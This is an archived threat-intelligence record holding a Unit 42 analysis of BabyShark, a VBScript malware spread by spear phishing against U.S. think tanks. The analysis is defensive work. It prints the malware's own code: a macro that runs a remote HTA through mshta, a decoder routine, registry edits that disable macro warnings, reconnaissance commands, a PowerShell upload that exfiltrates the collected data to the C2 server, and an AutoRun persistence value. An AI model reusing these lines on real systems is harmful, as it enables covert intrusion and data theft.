{
	"id": "673486ed-1f75-4ad2-b250-5f03a7d4bd48",
	"created_at": "2026-04-06T00:15:50.099715Z",
	"updated_at": "2026-04-10T03:22:37.408402Z",
	"deleted_at": null,
	"sha1_hash": "c83ac0b0a007d8cd4a030133253604e4d51cb9d5",
	"title": "New BabyShark Malware Targets U.S. National Security Think Tanks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 988850,
	"plain_text": "New BabyShark Malware Targets U.S. National Security Think Tanks\r\nBy Unit 42\r\nPublished: 2019-02-22 · Archived: 2026-04-02 12:06:51 UTC\r\n\r\nIn February 2019, Palo Alto Networks Unit 42 researchers identified spear phishing emails sent in November 2018 containing new malware that shares infrastructure with playbooks associated with North Korean campaigns. The spear phishing emails were written to appear as though they were sent from a nuclear security expert who currently works as a consultant for in the U.S. The emails were sent using a public email address with the expert’s name and had a subject referencing North Korea’s nuclear issues. The emails had a malicious Excel macro document attached, which when executed led to a new Microsoft Visual Basic (VB) script-based malware family which we are dubbing “BabyShark”.\r\n\r\nBabyShark is a relatively new malware. The earliest sample we found from open source repositories and our internal data sets was seen in November 2018. The malware is launched by executing the first stage HTA from a remote location, so it can be delivered via different file types, including PE files as well as malicious documents. It exfiltrates system information to the C2 server, maintains persistence on the system, and waits for further instructions from the operator. Figure 1, below, shows the flow of execution.\r\n\r\nFigure 1 BabyShark execution flow\r\nhttps://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\r\nPage 1 of 10\r\n\r\nUnit 42 was able to determine the phishing emails targeted at least:\r\nA university in the U.S. which was to hold a conference about the North Korea denuclearization issue at the time\r\nA research institute based in the U.S. which serves as a think tank for national security issues, and where the previously referenced nuclear expert currently works.\r\n\r\nExpanding our search to public repository samples, we identified additional malicious document samples delivering BabyShark. The original file names and decoy contents of these samples suggested that the threat actor might have interests in gathering intelligence related not only to North Korea, but possibly to the wider Northeast Asia region.\r\n\r\nDuring the investigation, we were able to find links to other suspected North Korean activities in the past: KimJongRAT and STOLEN PENCIL.\r\n\r\nMalicious Documents\r\n\r\nBabyShark is a relatively new malware. The first sample we observed is from November 2018. The decoy contents of all malicious documents delivering BabyShark were written in English and were related to Northeast Asia’s regional security issues.\r\n\r\nFigure 2 Timeline of BabyShark malicious documents and filename / decoys\r\n\r\nWhile some decoys used content which is publicly available on the internet, some used content which appears not to be public. Inspecting the metadata of the documents with this non-public content, we suspect that the threat actor likely compromised someone with access to private documents at a U.S. national security think tank.\r\n\r\nFigure 3 Decoy content copied from the internet\r\n\r\nFigure 4 Decoy content not publicly available on the internet (intentionally obfuscated)\r\n\r\nThe malicious documents contain a simple macro which loads BabyShark’s first stage HTA from a remote location.\r\n\r\nSub AutoOpen()\r\nShell (\"mshta https://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta\")\r\nEnd Sub\r\n\r\nBabyShark Malware Analysis\r\n\r\nAnalyzed sample details:\r\nSHA256: 9d842c9c269345cd3b2a9ce7d338a03ffbf3765661f1ee6d5e178f40d409c3f8\r\nCreate Date: 2018:12:31 02:40:00Z\r\nModify Date: 2019:01:10 06:54:00Z\r\nFilename: Oct_Bld_full_view.docm\r\nTable 1 Analyzed sample details\r\n\r\nThe sample is a Word document which contains a malicious macro loading BabyShark by executing the first stage HTA file at the remote location below:\r\nhttps://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta\r\n\r\nAfter successfully loading the first stage HTA, it sends out an HTTP GET request to another location on the same C2 server, then decodes the response content with the following decoder function.\r\n\r\n' Columnar transposition decoder: rebuilds the string by reading c column by column with stride d (d is set elsewhere in the script)\r\nFunction Co00(c)\r\nL=Len(c)\r\ns=\"\"\r\nFor jx=0 To d-1\r\nFor ix=0 To Int(L/d)-1\r\ns=s\u0026Mid(c,ix*d+jx+1,1)\r\nNext\r\nNext\r\n' Append the trailing characters that did not fill a complete row\r\ns=s\u0026Right(c,L-Int(L/d)*d)\r\nCo00=s\r\nEnd Function\r\n\r\nThe decoded BabyShark VB script first enables all future macros for Microsoft Word and Excel by adding the following registry keys:\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\VBAWarnings, value:1\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\VBAWarnings, value:1\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\VBAWarnings, value:1\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\WORD\\Security\\VBAWarnings, value:1\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\WORD\\Security\\VBAWarnings, value:1\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\WORD\\Security\\VBAWarnings, value:1\r\n\r\nIt then issues a sequence of Windows commands and saves the results in %AppData%\\Microsoft\\ttmp.log.\r\nwhoami\r\nhostname\r\nipconfig /all\r\nnet user\r\ndir \"%programfiles%\"\r\ndir \"%programfiles% (x86)\"\r\ndir \"%programdata%\\Microsoft\\Windows\\Start Menu\"\r\ndir \"%programdata%\\Microsoft\\Windows\\Start Menu\\Programs\"\r\ndir \"%appdata%\\Microsoft\\Windows\\Recent\"\r\ntasklist\r\nver\r\nset\r\nreg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"\r\n\r\nThe collected data is encoded using the Windows certutil.exe tool, then uploaded to the C2 via an HTTP POST request.\r\nretu=wShell.run(\"certutil -f -encode \"\"\"\u0026ttmp\u0026\"\"\" \"\"\"\u0026ttmp1\u0026\"\"\"\",0,true)\r\nretu=wShell.run(\"powershell.exe (New-Object System.Net.WebClient).UploadFile('https://tdalpacafarm[.]com/files/kr/contents/upload.php','\"\u0026ttmp1\u0026\"');del \"\"\"\u0026ttmp1\u0026\"\"\";del \"\"\"\u0026ttmp\u0026\"\"\"\",0,true)\r\n\r\nBabyShark adds the following registry key value to maintain persistence and waits for further commands from the operator. Unfortunately, we were not able to collect additional commands issued by the operator.\r\nHKCU\\Software\\Microsoft\\Command Processor\\AutoRun, value: \"powershell.exe mshta https://tdalpacafarm[.]com/files/kr/contents/Usoro.hta\"\r\n\r\nThis registry key executes the string value when cmd.exe is launched. BabyShark ensures cmd.exe is launched by registering the following scripts as scheduled tasks:\r\n[%AppData%\\Microsoft\\Axz\\zvftz.vbs]\r\nSet wShell=CreateObject(\"WScript.Shell\"):retu=wShell.run(\"cmd.exe /c taskkill /im cmd.exe\",0,true)\r\n[%AppData%\\Adobe\\Gqe\\urjlt.js]\r\nwShell=new ActiveXObject(\"WScript.Shell\");retu=wShell.run(\"cmd.exe /c taskkill /im cmd.exe\",0,true);\r\n\r\nLinks to Other Activity\r\n\r\nWe noticed BabyShark has connections with other suspected North Korean activities in the past: KimJongRAT and STOLEN PENCIL.\r\n\r\nKimJongRAT connection:\r\nBabyShark and KimJongRAT use the same file path for storing collected system information: %AppData%/Microsoft/ttmp.log.\r\nKimJongRAT had similar interests in targeting national security related targets. The malware was delivered with the following decoys:\r\n\r\nDecoy Filename | Dropper SHA256\r\nKendall-AFA 2014 Conference-17Sept14.pdf | c4547c917d8a9e027191d99239843d511328f9ec6278009d83b3b2b8349011a0\r\nU.S. Nuclear Deterrence.pdf | 1ad53f5ff0a782fec3bce952035bc856dd940899662f9326e01cb24af4de413d\r\n제30차한미안보 안내장 ENKO.fdp.etadpU.scr (translates to 30th Korea-U.S. National Security Invitation Update) | b3e85c569e89b6d409841463acb311839356c950d9eb64b9687ddc6a71d1b01b\r\nConference Information_2010 IFANS Conference on Global Affairs (1001).pdf | 0c8f17b2130addebcb2ca75bd7a982e37ddcc49d49e79fe60e3fda767f2ec972\r\nTable 2 Decoy filename used when delivering KimJongRAT\r\n\r\nThe threat actor behind the BabyShark malware frequently tested its samples for anti-virus detection when developing the malware. The testing samples included a freshly compiled KimJongRAT.\r\n\r\nSHA256 | Size | Compile Date | AV Test Site Upload Date\r\n52b898adaaf2da71c5ad6b3dfd3ecf64623bedf505eae51f9769918dbfb6b731 | 685,568 bytes | 2019-01-04 05:44:31 | 2019-01-04 08:15:41\r\nTable 3 Freshly compiled testing KimJongRAT sample\r\n\r\nSTOLEN PENCIL connection:\r\nA freshly compiled testing version of a PE type BabyShark loader was uploaded to a public sample repository. The sample was signed with the stolen code-signing certificate used in the STOLEN PENCIL campaign. We did not notice any other malware being signed with this certificate.\r\n\r\nSHA256 | Size | Compile Date | AV Test Site Upload Date\r\n6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c | 32,912 bytes | 2018-12-21 00:34:35 | 2018-12-21 08:30:28\r\nTable 4 Signed testing version of PE type BabyShark loader sample\r\n\r\nFigure 5 Codesign details\r\n\r\nConclusion\r\n\r\nBabyShark is being used in a limited spear phishing campaign which started in November 2018 and is still ongoing. The threat actor behind it has a clear focus on gathering intelligence related to Northeast Asia’s national security issues. Well-crafted spear phishing emails and decoys suggest that the threat actor is well aware of the targets, and also closely monitors related community events to gather the latest intelligence. While not conclusive, we suspect that the threat actor behind BabyShark is likely connected to the same actor who used the KimJongRAT malware family, and at least shares resources with the threat actor responsible for the STOLEN PENCIL campaign. We also noticed testing indicating the attackers are working on a PE loader for BabyShark. The threat actor may use different methods to deliver BabyShark in future campaigns.\r\n\r\nPalo Alto Networks customers are protected from this threat in the following ways:\r\nWildFire and Traps detect all the malware supported in this report as malicious.\r\nC2 domains used by the attackers are blocked via Threat Prevention.\r\nAutoFocus customers can monitor ongoing activity from the threats discussed in this report by looking at the following tag: BabyShark\r\n\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit cyberthreatalliance.org.\r\n\r\nIndicators of Compromise\r\n\r\nMalicious Documents:\r\n\r\nPE version loader, signed with stolen certificate:\r\n6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c\r\n\r\nSource: https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"MITRE",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/"
	],
	"report_names": [
		"new-babyshark-malware-targets-u-s-national-security-think-tanks"
	],
	"threat_actors": [
		{
			"id": "a02bb810-5dd2-46c1-a609-b44d984d96d0",
			"created_at": "2022-10-25T15:50:23.505735Z",
			"updated_at": "2026-04-10T02:00:05.398328Z",
			"deleted_at": null,
			"main_name": "Stolen Pencil",
			"aliases": [
				"Stolen Pencil"
			],
			"source_name": "MITRE:Stolen Pencil",
			"tools": [
				"Mimikatz",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434550,
	"ts_updated_at": 1775791357,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c83ac0b0a007d8cd4a030133253604e4d51cb9d5.pdf",
		"text": "https://archive.orkl.eu/c83ac0b0a007d8cd4a030133253604e4d51cb9d5.txt",
		"img": "https://archive.orkl.eu/c83ac0b0a007d8cd4a030133253604e4d51cb9d5.jpg"
	}
}